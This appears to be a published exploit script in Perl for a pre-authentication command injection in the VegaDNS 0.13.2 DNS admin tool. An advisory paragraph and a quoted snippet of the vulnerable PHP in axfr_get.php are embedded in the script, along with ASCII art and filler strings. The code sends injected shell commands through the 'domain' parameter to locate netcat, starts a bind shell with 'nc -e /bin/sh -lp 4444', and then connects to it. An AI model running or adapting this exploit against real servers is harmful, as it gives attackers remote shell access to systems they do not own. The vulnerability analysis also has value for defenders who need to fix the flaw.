
VegaDNS 0.13.2 Remote Command Injection

Posted on 22 September 2016

#!/usr/bin/perl $izd= qq{ aaaaaaaaaaaaaa aaaaaaa aaa aaaaaa aaaaaaa aaaaaaa aaaaaaa aaaaaaa aaaaaaaaaaaaaa aaaaaaaa aaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaa aaaaa aaa aaaaaaaaa aaaaaaaaaaa aaa aaaaaaaaaaaaaa aaaaaaaaaaa aaa aaaaa aaa aaaaaaaaaaaaaaaaaaaaa aaa aaaaaaaaaaaaaa aaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaa aaa aaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaa aaaaaaa aaa aaaaaaaa aaa aaaaaaa aaa aaa aaaaaaa aaa };$vg=qq{ a aaaa aaaaaaa aa aa aaaaa aaaaaaaaaaaaaa aaa aaaa aaa aaa a aaaaa aaaaaaaaaaaaa a a aaa aaa aaaa aaaaaaaaaaa aaaaa aaaaa aaaa aaaaaaaaaaaaa aaaaaaa aaaaa aaaaa aaa aaaaaaaaaaaaa aaaaaaaaaa a aaaaaa aaaa aaaa aa aaa aaaaaaaaaaa aaaaa a a aa aaa aaaaaaa aaaaa aaaa aaa aa aaa aaaaaa aaaaa aaaa aaa aaaaa aa aaaaa aaa aaaa aaaaaaaaaa aaaaaaaaaa a aaaa aaaaaa aaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaa a aaaaaaa aaa aaaaaaaaaaaaa aaaaaaaaaaa aaa aaaaaaaa aaa aaaa aaaaaaa aaaaaaaaaaaaaaaaaaaa aa a aaaaaa aa aaaaaaa aa aaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaa aa aa aaaaa aaa aaaaaaa aaa aaaaaaa a aaaaaa a a aaaaaaaaaaaaa aaa aaaaaa a aaaaa aaaaa a aa aaaaaaaaaa aaaaaaaaaaaa a aaaaa a aaa aaaaaaa a aaaaaaaaaaaaaa aaaaaaaa aaaaa aaaaa aaaaaaaaaa aaaaaaaaaaa aaaaaaaaaaaaaaaa aaaaaa aaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaa aaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaa a aaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaa a aaaaaaaaaaaaaaaaaa a a a aa aaaaaaaaaaaaaaaaaaa aaa aaaaa aaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaa aaaa aaaaaaaaaaaaaaaaaaaaaa a aaaa aaaaaaaaaaaaaaaaaaaaaaaaaaa a a aaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaa a aa a aa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a aaaa aa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a aaaa aaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaa aaaa aaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaa aa aaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaa a aaaa aaa aaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaa a aaaa aaa aaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaa a aaaa aaa a aaaaaaaaaaaaaa aaaa aaaaaaaaaaaa a a a aaaa aaaaaaaaaaaaaaaaa aaaaaaaaaaa 
aaa aaaaaa a aaaaaaaaaaaaaa aa a aaaaa a a aaa aaaaaaaa a a a aaaaaaaaaaaaaaaaaa a aaa aaaaaaa aaaaa aa aaa aaaaaaaaa a aaa a a aaaa aaaaaaa aa a aaaaaa aaaaaa aa a a aaaaaa aaaaaaaa a a a a aaaaaaaaaaaaaaaaa a aa a aaaaaaaaaaaaaaaa a aaaaaaa aaaaaaaaaaaaaaaaaa aaaaaaaaaaaaa aaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaaa aaaaaaaaaaaaa aaaaaaaaaaaa aaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa };$b=qq{ aaa aaaaaaaaaaa aaaaaaa aaaaaa aaaaaaa aaaa aaaaaaaaaaa aaa aaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaa aaa aaaaaaaaa aaa aaaaaaaaaaaaaaa aaaaaaaaa aaaaaaaaaaa aaaa aaaaaaaaaa aaa aaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaa aaaaaaa aaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaa aaaaaaaaaaaaaa aaaaa aaaaaaaa aaaaaaa aaa aaaaaaaaaa aaa aaaaaaaaaaaaa aaaaaaa aaaaaaaaaaaa aaaa aaaaaaa aaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaa aaaaaaaaaaaaaa aaa aaa aaaaaa aaaaaaaaaaaaaa aaaaaaaaaaaaaa aaa aaa aaaaaa aaa aaaaaaaaaaaaaa aaa aaaaaaaaaaaa aaa aaaaaaaa aaa aaaaaaaaaaaaaa aaa aaaaaaa aaa aaaaaaaa aaaaaaaaaaa aaaaaaaaaa aaa aaaaaaa aaaaaaaaaaaa aaaaaaa aaa aaa aaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaa aaaa aaaaaa aaaaaa aaaaaaaaaaa aaa aaaaaa aaa aaaaaaaa aaaaaaa aaaaaa aaaaaa aaaaaaa aaa aaa aaaaaa aaa aaaaaaaa aaaaa aaaaaaaaaaaa aaaaaa aaaaaaaaaaaaaaaaaaaa aaa aaaaaaaa aaa aaaaaaaaaaa aaaaaa aaaaaaaa aaaaaaa aaa aaa aaaaaaa aaa a aaa aaaa aaaaa aaaa aaaa aaaa aaaa aaaaa aaaaa aaaaa aaaaa aaaaa aaaaa aaaaa aaaaa aaaaaa aaaaa aaaaa aaaaa aaaa aaaa aaaa aaaa aaaa aaaa aaaa aaaaaaaaaaaa aaaaaaaaaaaa aaaa aaaaaaaaaaa aaaaaaaaaaa aaa aaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaa aaaaaaaaa aaa aaa aaaaaaaaa aaa aaa aaa aaa aaa aa a aa aaa aa a aa a a aa aa a aaa aa aa a aaa aaa aa aaaa aa aaaa aaa a aa aaaaaaa aaaaaaaaaaaa aaaaaaaa aa aa aaa aaa aa aa a aa a a aa aaaa aaa aa a a aa aaa aaa aaaaaaaaaaaaa aa a a a a a aaaaaaaaaaaaa aaa a aaa a a aaa a aa aa aaaaaa a a a a aa a aaaaaa aa aaaaaa aaaaa a aa aa a aaaa aaaaaa aa a 
aaaaa aaaaa a aa a aa ___ .___ .______ ._______._____ .___.__ ._______ .____ .___ .___ | |: __|: __ : .____/:_ ___ : | : .___ | |___ | | : | /| || : || \____|| : _/ | |___| : || : | || | || | | |/ : || || : | / | / || . || : || : || |/ | / || || |___|_.: __/|. __ ||___| | \_. ___/ | || / |______/|___||___||___| :/ :/ |. | |___| :/ |. _____/ |______/ : : :/ : :/ : : : };$g=qq{ aaaaaaa aaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaa aaaaaaaaaaaaaaaaaa aaaaaa aaa aaaaa aaa aaaaaaaaaaaaaaaaa aaaaaa aaa aaaaa aaaaaaaaaaaa aaaaaaaaaaaaaaaaaaa aaa aaaaaaaa aaaaaaa aaa aaaaaaaaaaaaaaaaaaa aaa aaaaaaaa To all the people with mad skills who share their knowledge: TecR0c, mr_me, action_dk, bcoles, TheColonial, jduck, hdmoore, rgod, TESO, mdowd, kernelpool, silviocesare, egyp7, w00 w00, felinemenace, corelan, lgandx, _sinne3r, alexsotirov, fjserna, solardiz, l0pth, cDc, therealsaumil, laughing_mantis, g0tm1k, nmrc, and many many more.... };$a=qq^ aaaaaa aaaa aaa aaaaaa aaa aaa aaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaa aaaaaaaaaaaaaa aaaa aaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaa aaaaaaaaaaaaaa aaaaaaa aaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaa aaaaaaaaaaaaaaaaaaa aaa aaaaaa aaaaaaaaa aaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaa aaa aaaaaa aaaaaaaa aaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaal VegaDNS is a tinydns administration tool written in PHP to allow easy administration of DNS records through a web browser. -- http://www.vegadns.org The file axfr_get.php allows unauthenticated access and fails to correctly apply input escaping to all variables that is based on user input. This allows an attacker to inject shell syntax constructs to take control of the command execution. The following code from axfr_get.php shows how the variable $file becomes tainted trough the $domain variable which is tainted from direct user input. 
The application tries to prevent this by escaping the $domain and $hostname variables, but fails to escape the $file variable. ---------------------------cut--------------------------- * NOTE: * This functionality ONLY exists outside of the main application * because tcplient kept dying fatally due to file descriptor 7 * being unavailable, which only occurs AFTER session_start() is * called. * */ require_once 'src/config.php'; // CHECKS // Make sure the hostname was given if(!isset($_REQUEST['hostname']) || $_REQUEST['hostname'] == "") { echo "ERROR: no hostname given "; exit; } // Make sure that some domains were given if(!isset($_REQUEST['domain']) || $_REQUEST['domain'] == "") { echo "ERROR: no domain was supplied "; exit; } $domain = $_REQUEST['domain']; $hostname = $_REQUEST['hostname']; $rand = rand(); $file = "/tmp/$domain.$rand"; $command = "$dns_tools_dir/tcpclient -R '".escapeshellcmd($hostname)."' 53 $dns_tools_dir/axfr-get '".escapeshellcmd($domain)."' $file $file.tmp 2>&1"; exec($command, $out); ---------------------------end--------------------------- aaaaaaaaaaa aaaaaaaaaa aaa aaaaaaa aaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaa aaaaaa aaaaaa aaaaaaaaaaa aaa aaaaaa aaa aaaaaa aaaaaa aaaaaaa aaa aaa aaaaaa aaa aaaaaaaaaaaa aaaaaa aaaaaaaaaaaaaaaaaaaa aaa aaaaaaaaaaa aaaaaa aaaaaaaa aaaaaaa aaa aaa ^; print "$izd "." " x 17 . "VegaDNS pre-auth RCE exploit by @Wireghoul "; print " "."=" x 50 ."[justanotherhacker.com]== "; &usage if ($ARGV[0] !~ m!.+://([^/:]+)!); $h=$1; print " . . . Locating netcat "; $cmd='which+nc'; $t=$ARGV[0]."/axfr_get?hostname=izunadrop&domain=%3b$cmd%3bagev"; $z=`curl -s -k '$t'`; if ($z !~ m{/nc}) { print " ! ! ! netcat not found! Manual exploitation required: "; print " $ARGV[0]/axfr_get?hostname=izunadrop&domain=%3bCMD%3b "; exit 1; } print " . . . netcat found: $z "; print " . . . Performing IZUNA DROP! 
"; # a A* a A* a A* a A* <img src="https://s.w.org/images/core/emoji/2/svg/2196.svg" alt="a" class="emoji" draggable="false"> A* <img src="https://s.w.org/images/core/emoji/2/svg/2197.svg" alt="a" class="emoji" draggable="false"> A* <img src="https://s.w.org/images/core/emoji/2/svg/2198.svg" alt="a" class="emoji" draggable="false"> A* <img src="https://s.w.org/images/core/emoji/2/svg/2199.svg" alt="a" class="emoji" draggable="false"> print " a a a *k* a a *p* "; $cmd="$z+-e+/bin/sh+-lp+4444"; $t=$ARGV[0]."/axfr_get?hostname=izunadrop&domain=%3b$cmd%3bagev"; $z=`curl -m 3 -s -k '$t &'`; print $vg." "; print " . . . K.O ! ! ! Connecting to bindshell on $h port 4444 "; system("nc -v $h 4444"); sub usage { print "Usage $0 http://host/path/to/vegadns $ARGV[0]"; exit;

 
